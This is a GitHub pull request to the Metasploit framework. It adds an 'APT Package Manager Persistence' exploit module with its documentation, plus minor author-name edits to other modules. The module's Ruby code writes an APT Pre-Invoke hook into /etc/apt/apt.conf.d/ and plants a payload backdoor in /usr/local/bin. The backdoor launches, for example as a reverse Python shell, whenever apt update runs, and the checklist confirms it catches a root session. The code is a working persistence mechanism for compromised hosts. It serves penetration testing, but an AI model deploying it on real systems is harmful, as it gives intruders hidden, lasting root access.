### PR TITLE
Add Apt package manager persistence module

### DIFF
--- a/documentation/modules/exploit/linux/local/apt_package_manager_persistence.md
+++ b/documentation/modules/exploit/linux/local/apt_package_manager_persistence.md
@@ -1,0 +1,36 @@
+## Apt package manager persistence
+
+This module will run a payload when the package manager is used. No
+handler is ran automatically so you must configure an appropriate
+exploit/multi/handler to connect. Module creates a pre-invoke hook
+for APT in apt.conf.d. The Hook name syntax is numeric followed by text.  
+
+### Testing
+
+1. Exploit a box
+2. `use linux/local/apt_package_manager_persistence`
+3. `set SESSION <id>`
+4. `set PAYLOAD cmd/unix/reverse_python` configure the payload as needed
+5. `exploit`
+
+When the system runs apt-get update the payload will launch.  You must set handler accordingly.
+
+### Options
+
+**BACKDOOR_NAME**
+Name of backdoor executable
+ 
+**HOOKNAME**
+Name of pre-invoke hook to be installed in /etc/apt/apt.conf.d/ default is (05new-hook).
+Pre-invoke hooks name syntax is numeric followed by text. 
+  
+**SESSION**
+The session to run this module on.
+ 
+### Advanced        Options
+
+**WritableDir**
+Writable directory for backdoor default is (/usr/local/bin/)       
+
+
+

--- a/modules/auxiliary/scanner/printer/canon_iradv_pwd_extract.rb
+++ b/modules/auxiliary/scanner/printer/canon_iradv_pwd_extract.rb
@@ -26,7 +26,7 @@ class MetasploitModule < Msf::Auxiliary
         [
           'Deral "Percentx" Heiland',
           'Pete "Bokojan" Arzamendi',
-          'William Vu',
+          'wvu',
           'Dev Mohanty'
         ],
       'License'        => MSF_LICENSE

--- a/modules/exploits/linux/local/apt_package_manager_persistence.rb
+++ b/modules/exploits/linux/local/apt_package_manager_persistence.rb
@@ -1,0 +1,96 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+  include Msf::Post::File
+  include Msf::Post::Linux::System
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'APT Package Manager Persistence',
+      'Description'    => %q{
+        This module will run a payload when the package manager is used. No
+        handler is ran automatically so you must configure an appropriate
+        exploit/multi/handler to connect. Module creates a pre-invoke hook
+        for APT in apt.conf.d. The Hook name syntax is numeric followed by text.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [ 'Aaron Ringo' ],
+      'Platform'       => [ 'linux','unix','python' ],
+      'Arch'           =>
+        [
+          ARCH_CMD,
+          ARCH_X86,
+          ARCH_X64,
+          ARCH_ARMLE,
+          ARCH_AARCH64,
+          ARCH_PPC,
+          ARCH_MIPSLE,
+          ARCH_MIPSBE
+        ],
+      'SessionTypes'   => [ 'shell', 'meterpreter' ],
+      'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => 'true' },
+      'DisclosureDate' => 'Mar 9 1999', # Date Apt package manager was included in Debian
+      'References'     => ['URL', 'https://unix.stackexchange.com/questions/204414/how-to-run-a-command-before-download-with-apt-get'],
+      'Targets'        => [ ['Automatic', {}] ],
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('HOOKNAME', [ true, 'Name of hook file to write', '05new-hook' ]),
+        OptString.new('BACKDOOR_NAME', [ true, 'Name of binary to write', 'apthook' ])
+      ])
+
+    register_advanced_options(
+      [
+        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/usr/local/bin/' ])
+      ])
+    end
+
+  def exploit
+
+    hook_path = "/etc/apt/apt.conf.d/"
+    unless writable? hook_path
+      fail_with Failure::BadConfig, "#{hook_path} not writable, or apt is not on system"
+    end
+    hook_path << datastore['HOOKNAME']
+
+    backdoor_path = datastore['WritableDir']
+    unless writable? backdoor_path
+      fail_with Failure::BadConfig, "#{backdoor_path} is not writable"
+    end
+    backdoor_path << datastore['BACKDOOR_NAME'] || rand_text_alphanumeric(5..10)
+
+    print_status("Attempting to write hook:")
+    hook_script = "APT::Update::Pre-Invoke {\"setsid #{backdoor_path} &\"};"
+    write_file(hook_path, hook_script)
+
+    unless exist? hook_path
+      fail_with Failure::Unknown, "Failed to write Hook"
+    end
+    print_status("Wrote #{hook_path}")
+
+    if payload.arch.first == 'cmd'
+      write_file(backdoor_path, payload.encoded)
+    else
+      write_file(backdoor_path, generate_payload_exe)
+    end
+
+    unless exist? backdoor_path
+      fail_with Failure::Unknown, "Failed to write #{backdoor_path}"
+    end
+    print_status("Backdoor uploaded #{backdoor_path}")
+    print_status("Backdoor will run on next Apt update")
+
+    # permissions chosen to reflect common perms in /usr/local/bin/
+    chmod(backdoor_path, 0755)
+
+  end
+end
+

--- a/modules/exploits/linux/misc/jenkins_java_deserialize.rb
+++ b/modules/exploits/linux/misc/jenkins_java_deserialize.rb
@@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote
             'Steve Breen',         # Public Exploit
             'Dev Mohanty',         # Metasploit module
             'Louis Sato',          # Metasploit
-            'William Vu',          # Metasploit
+            'wvu',                 # Metasploit
             'juan vazquez',        # Metasploit
             'Wei Chen'             # Metasploit
           ],

--- a/modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb
+++ b/modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb
@@ -60,7 +60,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'Notes'              => {
         'Stability'        => [CRASH_SAFE],
         'SideEffects'      => [ARTIFACTS_ON_DISK],
-        'Reliablity'       => [REPEATABLE_SESSION]
+        'Reliablity'       => [REPEATABLE_SESSION],
+        'NOCVE'            => 'Patched in 2.00.8643' # TODO: Add firmware check
       }
     ))
 


### PR DESCRIPTION
This module will run a payload when the package manager is triggered. Module installs a pre-invoke hook for APT in apt.conf.d.

## Verification

- [ ] Start `msfconsole`
- [ ] Get a privileged session on a target that uses the Apt package manger 
- [ ] `use exploit/linux/local/apt_package_manager_persistence`
- [ ] Choose a payload and set options 
- [ ] `exploit`
- [ ] **Verify** Wrote hook file , wrote binary
- [ ] **Verify** fail if no permissions to write hook or binary
- [ ] `use exploit/multi/handler/` 
- [ ] Choose a payload and set options 
- [ ] `run`
- [ ] On target run `sudo apt-get update`
- [ ] **Verify** Caught a root session
- [ ] **Documentation** Included  

![apt](https://user-images.githubusercontent.com/3400203/55281906-b7341b80-5308-11e9-9ed7-f2f9851d3e1e.png)

